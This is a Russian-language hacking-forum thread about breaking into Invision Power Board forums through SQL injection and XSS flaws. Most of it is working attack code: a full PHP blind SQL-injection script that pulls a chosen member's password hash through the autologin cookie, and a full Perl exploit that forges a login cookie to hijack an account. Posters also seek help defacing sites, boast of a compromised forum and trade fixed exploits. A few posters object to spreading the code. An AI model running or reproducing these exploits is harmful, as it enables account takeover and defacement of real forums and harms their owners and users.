Взлом Invision Power Board

[Winux]

Так, тото кто сделал баг фиксы, у того и не пашет, а тот кто их не ставил - сидит с фигом и думает как это его сайт отдефили?!
Я, например, заделал эту дырку. Кстати какой код юзаешь?

 

[dampil]

Блин..потерял

 

[FAST]

Еще один баг в IPB

Программа: Invision Power Board <=2.0.3
SQL-инъекция существует из-за недостаточной обработки данных в сценарии 'sources/login.php'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения при выключенных Magic_quotes_gpc в конфигурационном файле php.

Отсутствует проверка входных данных при отображении результатов поиска в параметре 'highlite' сценария 'sources/topics.php'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
подробное описание: http://www.securitylab.ru/54518.html Источник securitylab.ru

 

[Megaladon]

Вот новая уязвимость,она есть на античате.Короче мне нужна помощь,вы там разберитесь что к чему,а проблема в pl файле,где надо чо-то редактировать,видео сделали,да никто не может испробовать.Короче ребят,у кого получится дефейс с помощью этой уязвимости,напишите сюда.

 

[BUG(O)R]

Там выправить сплоит надо!!!

$allchar .= chr(42);

Вот неверная строка, она будет выдавать вам не хеш, а звёздочки... как выправить думайте сами... а то совсем обленились!

 

[Winux]

Линк битый:

НОВОСТИ

Новость не найдена!

Поправь.

 

[©yBe®0Ge№]

"Новость не найдена" вот что он мне выдал... на античате эту новость удалили... все облазил нигде нету...
Эксплойт нашел http://rst.void.ru
Кез удалил видео по этому багу

 

[Winux]

Так, сплойт качнул, хотя инфу о баге посмотреть не успел. Напишите вкратце что там было.

 

[Winux]

Вообщем респектуем THE_GAMEFUCKERа за видео по этому багу. обсуждение все тут. А эту тему ща перетащу в соответствующую.

Кстати сплойт не так уж много перепахать надо. Всего 1 строчка.

 

[Megaladon]

Короче я так понял,что статью удалили из-за того,что там в коментариях много орали матом,типа почему не пашет или что редактировать в 90 строке,вот они ее нафиг и снесли.Мне повезло,я успел видео качнуть,кому надо,попросите,где-нибудь выложу.

 

[FreeAtNet]

Значчится так! Выложив видео по исправлению эксплоита, я попал под критику за неосторожное распространение кода, который может быть использован киддисами.
Мною было решено исключить из видео процесс исправления кода. Если кому-то понадобится исправленный код, велком то май айсику. 98-3-444. Раздача будет проводится только тем, у кого есть осмысленные посты на этой доске, либо на нормальных досках(Веб-Хак, КардингВорлд итд)
Megaladon
Настоятельно НЕ советую тебе распространять видео. Это не угроза, а предупреждение.

 

[Megaladon]

Да нет,я просто имел ввиду,я его с античата скачал,а статью удалили,вы то не успели наверно скачал,я так просто говорил,если надо будет дам

 

[c31337]

<?php
$server = "SERVER";
$port = 80;
$file = "PATH";

$target = 81;

/* User id and password used to fake-logon are not important. '10' is a
random number. */
$id = 10;
$pass = "";

$hex = "0123456789abcdef";
for($i = 1; $i <= 32; $i++ ) {
$idx = 0;
$found = false;

while( !($found) ) {
$letter = substr($hex, $idx, 1);

/* %2527 translates to %27, which gets past magic quotes.
This is translated to ' by urldecode. */
$cookie =
"member_id=$id;pass_hash=$pass%2527%20OR%20id=$target";
$cookie .=
"%20HAVING%20id=$target%20AND%20MID(`password`,$i,1)=%2527" . $letter;

/* Query is in effect: SELECT * FROM ibf_members
WHERE id=$id AND password='$pass' OR
id=$target
HAVING id=$target AND
MID(`password`,$i,1)='$letter' */

$header = getHeader($server, $port, $file .
"index.php?act=Login&CODE=autologin", $cookie);
if( !preg_match('/Location.*)act\=Login\&CODE\=00\r\n/',
$header) ) {
echo $i . ": " . $letter . "\n";
$found = true;

$hash .= $letter;
} else {
$idx++;
}
}
}

echo "\n\nFinal Hash: $hash\n";

function getHeader($server, $port, $file, $cookie) {
$ip = gethostbyname($server);
$fp = fsockopen($ip, $port);

if (!$fp) {
return "Unknown";
} else {
$com = "HEAD $file HTTP/1.1\r\n";
$com .= "Host: $server:$port\r\n";
$com .= "Cookie: $cookie\r\n";
$com .= "Connection: close\r\n";
$com .= "\r\n";

fputs($fp, $com);

do {
$header.= fread($fp, 512);
} while( !preg_match('/\r\n\r\n$/',$header) );
}

return $header;
}
?>

Вот перепись сплоита на PHP

 

[Winux]

c31337
Нафига исправленый вывалил?
Мы спецом видео убрали чтоб некоторые киддисы на возюзали...

 

[c31337]

Я конечно извиняюсь но это не исправленный сплоит это он же но на пхп. А что касается киддисов, то пусть ломают мне лично до них дела нет. Даже наоборот это смена растет теперешним хакерам.

 

[Winux]

c31337
Ну лана извени. Я багу закрыл на дрпугих мне пох. Кстати 1cq.ru поимели на этой баге. И на iseekyou.ru я помог баг закрыть.

 

[Змий]

Ничего себе... однако, сколько же багов в IPB есть и ещё будет... ни один форум несовершенен, даже IPB.

 

[Winux]

Ну уязвимости далеко не все актуальны. Сплойт от RST не работает на 60 % форумах. Ничего нового пока нет. Ждем новой баги.

 

[Winux]

Вот еще 1 сплойтик. Якобы работает на все версии кроме 2.0.4
Сплойт нерабочий, вероятно допущена ошибка (специально), поэтому выводит всякий бред. Чует мое сердце что сплойт работает на той же баге что и сплойт от RST. Вот код сплойта:

#!/usr/bin/perl -w 
################################################################## 
# This one actually works :) Just paste the outputted cookie into 
# your request header using livehttpheaders or something and you 
# will probably be logged in as that user. No need to decrypt it! 
# Exploit coded by "ReMuSOMeGa & Nova" and http://www.h4cky0u.org 
################################################################## 
 
use LWP::UserAgent; 
 
   $ua = new LWP::UserAgent; 
   $ua->agent("Mosiac 1.0" . $ua->agent); 
 
if (!$ARGV[0]) {$ARGV[0] = '';} 
if (!$ARGV[3]) {$ARGV[3] = '';} 
 
my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin'; 
my $user = $ARGV[1];   # userid to jack 
my $iver = $ARGV[2];   # version 1 or 2 
my $cpre = $ARGV[3];   # cookie prefix 
my $dbug = $ARGV[4];   # debug? 
 
if (!$ARGV[2]) 
{ 
        print "..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 
1/2].\n\n"; 
        exit; 
} 
 
my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f"); 
 
my $outputs = ''; 
 
for( $i=1; $i < 33; $i++ ) 
{ 
        for( $j=0; $j < 16; $j++ ) 
        { 
                my $current = $charset[$j]; 
            my $sql = ( $iver < 2 ) ?  
"99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*" : 
"99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2
527)/*"; 
                my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . 
"pass_hash=" . $sql); 
                my $res = $ua->get($path, @cookie); 
 
                # If we get a valid sql request then this 
                # does not appear anywhere in the sources 
                $pattern = '<title>(.*)Log In(.*)</title>'; 
 
                $_ = $res->content; 
 
                if ($dbug) { print }; 
 
                if ( !(/$pattern/) ) 
                { 
                        $outputs .= $current; 
                        print "$current\n"; 
                    last; 
                } 
 
        } 
  if ( length($outputs) < 1 )   { print "Not Exploitable!\n"; exit;     } 
} 
print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs; 
exit;

 

[Змий]

Ну вот, я же говорил. Почти каждый день - новая дырка, хотя и не всегда работающая. Не лучше ли выкладывать обновления на IPB, а потенциально опасные для этих форумов сплойты или описания дыр выкладывать немного изменёнными...
Никому не будет приятно, когда его собственный форум взломает какой - то ребёнок, который даже сам дыру найти не может, а просто зашёл на форум и бездумно скопировал всё что надо. Так что лучше вместо выкладывания здесь сплойтов, попытаться сделать заплаты для IPB форумов.